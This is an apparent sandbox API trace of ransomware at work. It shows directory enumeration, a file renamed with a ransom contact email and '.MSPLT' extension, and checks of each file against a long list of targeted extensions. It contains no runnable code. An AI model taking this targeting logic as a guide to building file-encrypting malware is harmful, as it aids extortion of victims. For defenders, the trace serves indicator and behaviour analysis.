ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3947d28 [0284.082] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0284.085] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bece217, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bece217, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5befd752, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1094, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.087] lstrlenW (lpString="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 52 [0284.087] lstrlenW (lpString=".1cd") returned 4 [0284.087] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0284.087] lstrlenW (lpString=".3ds") returned 4 [0284.087] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0284.087] lstrlenW (lpString=".3fr") returned 4 [0284.087] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0284.099] lstrlenW (lpString=".3g2") returned 4 [0284.099] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0284.099] lstrlenW (lpString=".3gp") returned 4 [0284.099] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0284.100] lstrlenW (lpString=".7z") returned 3 [0284.163] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0284.163] lstrlenW (lpString=".accda") returned 6 [0284.163] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0284.163] lstrlenW (lpString=".accdb") returned 6 [0284.163] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0284.163] lstrlenW (lpString=".accdc") returned 6 [0284.163] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0284.163] lstrlenW (lpString=".accde") returned 6 [0284.163] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0284.163] lstrlenW (lpString=".accdt") returned 6 [0284.163] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0284.163] lstrlenW (lpString=".accdw") returned 6 [0284.163] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0284.163] lstrlenW (lpString=".adb") returned 4 [0284.163] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0284.163] lstrlenW (lpString=".adp") returned 4 [0284.163] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0284.163] lstrlenW (lpString=".ai") returned 3 [0284.163] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0284.163] lstrlenW (lpString=".ai3") returned 4 [0284.163] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0284.163] lstrlenW (lpString=".ai4") returned 4 [0284.163] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0284.163] lstrlenW (lpString=".ai5") returned 4 [0284.163] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0284.163] lstrlenW (lpString=".ai6") returned 4 [0284.163] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0284.164] lstrlenW (lpString=".ai7") returned 4 [0284.164] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0284.164] lstrlenW (lpString=".ai8") returned 4 [0284.164] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0284.164] lstrlenW (lpString=".anim") returned 5 [0284.164] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0284.164] lstrlenW (lpString=".arw") returned 4 [0284.164] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0284.164] lstrlenW (lpString=".as") returned 3 [0284.164] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0284.164] lstrlenW (lpString=".asa") returned 4 [0284.164] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0284.164] lstrlenW (lpString=".asc") returned 4 [0284.164] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0284.164] lstrlenW (lpString=".ascx") returned 5 [0284.164] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0284.164] lstrlenW (lpString=".asm") returned 4 [0284.164] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0284.164] lstrlenW (lpString=".asmx") returned 5 [0284.164] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0284.164] lstrlenW (lpString=".asp") returned 4 [0284.164] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0284.164] lstrlenW (lpString=".aspx") returned 5 [0284.164] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0284.164] lstrlenW (lpString=".asr") returned 4 [0284.164] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0284.164] lstrlenW (lpString=".asx") returned 4 [0284.164] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0284.164] lstrlenW (lpString=".avi") returned 4 [0284.164] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0284.164] lstrlenW (lpString=".avs") returned 4 [0284.164] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0284.164] lstrlenW (lpString=".backup") returned 7 [0284.164] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0284.165] lstrlenW (lpString=".bak") returned 4 [0284.165] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0284.165] lstrlenW (lpString=".bay") returned 4 [0284.165] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0284.165] lstrlenW (lpString=".bd") returned 3 [0284.165] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0284.165] lstrlenW (lpString=".bin") returned 4 [0284.165] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0284.165] lstrlenW (lpString=".bmp") returned 4 [0284.165] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0284.165] lstrlenW (lpString=".bz2") returned 4 [0284.165] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0284.165] lstrlenW (lpString=".c") returned 2 [0284.165] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0284.165] lstrlenW (lpString=".cdr") returned 4 [0284.165] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0284.165] lstrlenW (lpString=".cer") returned 4 [0284.165] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0284.165] lstrlenW (lpString=".cf") returned 3 [0284.165] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0284.165] lstrlenW (lpString=".cfc") returned 4 [0284.165] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0284.165] lstrlenW (lpString=".cfm") returned 4 [0284.165] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0284.165] lstrlenW (lpString=".cfml") returned 5 [0284.165] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0284.165] lstrlenW (lpString=".cfu") returned 4 [0284.165] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0284.165] lstrlenW (lpString=".chm") returned 4 [0284.166] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0284.166] lstrlenW (lpString=".cin") returned 4 [0284.166] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0284.166] lstrlenW (lpString=".class") returned 6 [0284.166] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0284.166] lstrlenW (lpString=".clx") returned 4 [0284.166] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0284.166] lstrlenW (lpString=".config") returned 7 [0284.166] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0284.166] lstrlenW (lpString=".cpp") returned 4 [0284.166] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0284.166] lstrlenW (lpString=".cr2") returned 4 [0284.166] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0284.166] lstrlenW (lpString=".crt") returned 4 [0284.166] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0284.166] lstrlenW (lpString=".crw") returned 4 [0284.166] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0284.166] lstrlenW (lpString=".cs") returned 3 [0284.166] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0284.166] lstrlenW (lpString=".css") returned 4 [0284.166] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0284.166] lstrlenW (lpString=".csv") returned 4 [0284.166] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0284.166] lstrlenW (lpString=".cub") returned 4 [0284.166] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0284.166] lstrlenW (lpString=".dae") returned 4 [0284.166] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0284.166] lstrlenW (lpString=".dat") returned 4 [0284.166] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0284.166] lstrlenW (lpString=".db") returned 3 [0284.167] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0284.167] lstrlenW (lpString=".dbf") returned 4 [0284.167] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0284.167] lstrlenW (lpString=".dbx") returned 4 [0284.167] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0284.167] lstrlenW (lpString=".dc3") returned 4 [0284.167] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0284.167] lstrlenW (lpString=".dcm") returned 4 [0284.167] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0284.167] lstrlenW (lpString=".dcr") returned 4 [0284.167] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0284.167] lstrlenW (lpString=".der") returned 4 [0284.167] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0284.167] lstrlenW (lpString=".dib") returned 4 [0284.167] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0284.167] lstrlenW (lpString=".dic") returned 4 [0284.167] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0284.167] lstrlenW (lpString=".dif") returned 4 [0284.167] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0284.167] lstrlenW (lpString=".divx") returned 5 [0284.167] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0284.167] lstrlenW (lpString=".djvu") returned 5 [0284.167] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0284.167] lstrlenW (lpString=".dng") returned 4 [0284.167] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0284.167] lstrlenW (lpString=".doc") returned 4 [0284.167] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0284.167] lstrlenW (lpString=".docm") returned 5 [0284.167] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0284.167] lstrlenW (lpString=".docx") returned 5 [0284.167] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0284.168] lstrlenW (lpString=".dot") returned 4 [0284.168] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0284.168] lstrlenW (lpString=".dotm") returned 5 [0284.168] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0284.168] lstrlenW (lpString=".dotx") returned 5 [0284.168] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0284.168] lstrlenW (lpString=".dpx") returned 4 [0284.168] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0284.168] lstrlenW (lpString=".dqy") returned 4 [0284.168] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0284.168] lstrlenW (lpString=".dsn") returned 4 [0284.168] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0284.168] lstrlenW (lpString=".dt") returned 3 [0284.168] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0284.168] lstrlenW (lpString=".dtd") returned 4 [0284.168] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0284.168] lstrlenW (lpString=".dwg") returned 4 [0284.168] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0284.168] lstrlenW (lpString=".dwt") returned 4 [0284.168] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0284.168] lstrlenW (lpString=".dx") returned 3 [0284.168] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0284.168] lstrlenW (lpString=".dxf") returned 4 [0284.168] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0284.168] lstrlenW (lpString=".edml") returned 5 [0284.168] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0284.168] lstrlenW (lpString=".efd") returned 4 [0284.168] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0284.168] lstrlenW (lpString=".elf") returned 4 [0284.168] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0284.169] lstrlenW (lpString=".emf") returned 4 [0284.169] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0284.169] lstrlenW (lpString=".emz") returned 4 [0284.169] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0284.169] lstrlenW (lpString=".epf") returned 4 [0284.169] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0284.169] lstrlenW (lpString=".eps") returned 4 [0284.169] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0284.169] lstrlenW (lpString=".epsf") returned 5 [0284.169] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0284.169] lstrlenW (lpString=".epsp") returned 5 [0284.169] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0284.169] lstrlenW (lpString=".erf") returned 4 [0284.169] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0284.169] lstrlenW (lpString=".exr") returned 4 [0284.169] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0284.169] lstrlenW (lpString=".f4v") returned 4 [0284.169] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0284.169] lstrlenW (lpString=".fido") returned 5 [0284.169] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0284.169] lstrlenW (lpString=".flm") returned 4 [0284.169] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0284.169] lstrlenW (lpString=".flv") returned 4 [0284.169] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0284.169] lstrlenW (lpString=".frm") returned 4 [0284.169] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0284.169] lstrlenW (lpString=".fxg") returned 4 [0284.169] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0284.169] lstrlenW (lpString=".geo") returned 4 [0284.169] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0284.169] lstrlenW (lpString=".gif") returned 4 [0284.170] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0284.170] lstrlenW (lpString=".grs") returned 4 [0284.170] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0284.170] lstrlenW (lpString=".gz") returned 3 [0284.170] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0284.170] lstrlenW (lpString=".h") returned 2 [0284.170] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0284.170] lstrlenW (lpString=".hdr") returned 4 [0284.170] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0284.170] lstrlenW (lpString=".hpp") returned 4 [0284.170] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0284.170] lstrlenW (lpString=".hta") returned 4 [0284.170] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0284.170] lstrlenW (lpString=".htc") returned 4 [0284.170] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0284.170] lstrlenW (lpString=".htm") returned 4 [0284.170] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0284.170] lstrlenW (lpString=".html") returned 5 [0284.170] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0284.170] lstrlenW (lpString=".icb") returned 4 [0284.170] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0284.170] lstrlenW (lpString=".ics") returned 4 [0284.170] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0284.170] lstrlenW (lpString=".iff") returned 4 [0284.170] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0284.170] lstrlenW (lpString=".inc") returned 4 [0284.170] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0284.170] lstrlenW (lpString=".indd") returned 5 [0284.170] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0284.170] lstrlenW (lpString=".ini") returned 4 [0284.171] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0284.171] lstrlenW (lpString=".iqy") returned 4 [0284.171] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0284.171] lstrlenW (lpString=".j2c") returned 4 [0284.171] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0284.171] lstrlenW (lpString=".j2k") returned 4 [0284.171] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0284.171] lstrlenW (lpString=".java") returned 5 [0284.171] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0284.171] lstrlenW (lpString=".jp2") returned 4 [0284.171] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0284.171] lstrlenW (lpString=".jpc") returned 4 [0284.171] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0284.171] lstrlenW (lpString=".jpe") returned 4 [0284.171] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0284.171] lstrlenW (lpString=".jpeg") returned 5 [0284.171] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0284.171] lstrlenW (lpString=".jpf") returned 4 [0284.171] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0284.171] lstrlenW (lpString=".jpg") returned 4 [0284.171] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0284.171] lstrlenW (lpString=".jpx") returned 4 [0284.171] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0284.171] lstrlenW (lpString=".js") returned 3 [0284.171] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0284.171] lstrlenW (lpString=".jsf") returned 4 [0284.171] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0284.171] lstrlenW (lpString=".json") returned 5 [0284.171] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0284.171] lstrlenW (lpString=".jsp") returned 4 [0284.171] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".kdc") returned 4 [0284.172] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".kmz") returned 4 [0284.172] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".kwm") returned 4 [0284.172] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".lasso") returned 6 [0284.172] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0284.172] lstrlenW (lpString=".lbi") returned 4 [0284.172] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".lgf") returned 4 [0284.172] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".lgp") returned 4 [0284.172] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".log") returned 4 [0284.172] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".m1v") returned 4 [0284.172] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".m4a") returned 4 [0284.172] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".m4v") returned 4 [0284.172] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".max") returned 4 [0284.172] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".md") returned 3 [0284.172] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0284.172] lstrlenW (lpString=".mda") returned 4 [0284.172] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".mdb") returned 4 [0284.172] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".mde") returned 4 [0284.172] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0284.172] lstrlenW (lpString=".mdf") returned 4 [0284.173] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0284.173] lstrlenW (lpString=".mdw") returned 4 [0284.173] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0284.173] lstrlenW (lpString=".mef") returned 4 [0284.173] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0284.173] lstrlenW (lpString=".mft") returned 4 [0284.173] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0284.173] lstrlenW (lpString=".mfw") returned 4 [0284.173] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0284.173] lstrlenW (lpString=".mht") returned 4 [0284.173] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0284.173] lstrlenW (lpString=".mhtml") returned 6 [0284.173] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0284.173] lstrlenW (lpString=".mka") returned 4 [0284.173] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0284.173] lstrlenW (lpString=".mkidx") returned 6 [0284.173] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0284.173] lstrlenW (lpString=".mkv") returned 4 [0284.173] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0284.173] lstrlenW (lpString=".mos") returned 4 [0284.173] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0284.173] lstrlenW (lpString=".mov") returned 4 [0284.173] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0284.173] lstrlenW (lpString=".mp3") returned 4 [0284.173] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0284.173] lstrlenW (lpString=".mp4") returned 4 [0284.173] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0284.173] lstrlenW (lpString=".mpeg") returned 5 [0284.173] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0284.173] lstrlenW (lpString=".mpg") returned 4 [0284.173] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0284.173] lstrlenW (lpString=".mpv") returned 4 [0284.173] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".mrw") returned 4 [0284.174] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".msg") returned 4 [0284.174] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".mxl") returned 4 [0284.174] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".myd") returned 4 [0284.174] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".myi") returned 4 [0284.174] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".nef") returned 4 [0284.174] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".nrw") returned 4 [0284.174] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".obj") returned 4 [0284.174] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".odb") returned 4 [0284.174] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".odc") returned 4 [0284.174] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".odm") returned 4 [0284.174] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".odp") returned 4 [0284.174] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".ods") returned 4 [0284.174] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".oft") returned 4 [0284.174] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".one") returned 4 [0284.174] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0284.174] lstrlenW (lpString=".onepkg") returned 7 [0284.175] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0284.175] lstrlenW (lpString=".onetoc2") returned 8 [0284.175] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0284.175] lstrlenW (lpString=".opt") returned 4 [0284.175] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0284.175] lstrlenW (lpString=".oqy") returned 4 [0284.175] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0284.175] lstrlenW (lpString=".orf") returned 4 [0284.175] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0284.175] lstrlenW (lpString=".p12") returned 4 [0284.175] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0284.175] lstrlenW (lpString=".p7b") returned 4 [0284.175] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0284.175] lstrlenW (lpString=".p7c") returned 4 [0284.175] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0284.175] lstrlenW (lpString=".pam") returned 4 [0284.175] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0284.175] lstrlenW (lpString=".pbm") returned 4 [0284.175] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0284.175] lstrlenW (lpString=".pct") returned 4 [0284.175] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0284.175] lstrlenW (lpString=".pcx") returned 4 [0284.175] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0284.175] lstrlenW (lpString=".pdd") returned 4 [0284.175] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0284.175] lstrlenW (lpString=".pdf") returned 4 [0284.175] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0284.175] lstrlenW (lpString=".pdp") returned 4 [0284.176] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0284.176] lstrlenW (lpString=".pef") returned 4 [0284.176] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0284.176] lstrlenW (lpString=".pem") returned 4 [0284.176] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0284.176] lstrlenW (lpString=".pff") returned 4 [0284.176] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0284.176] lstrlenW (lpString=".pfm") returned 4 [0284.176] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0284.176] lstrlenW (lpString=".pfx") returned 4 [0284.176] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0284.176] lstrlenW (lpString=".pgm") returned 4 [0284.176] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0284.176] lstrlenW (lpString=".php") returned 4 [0284.176] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0284.176] lstrlenW (lpString=".php3") returned 5 [0284.176] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0284.176] lstrlenW (lpString=".php4") returned 5 [0284.176] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 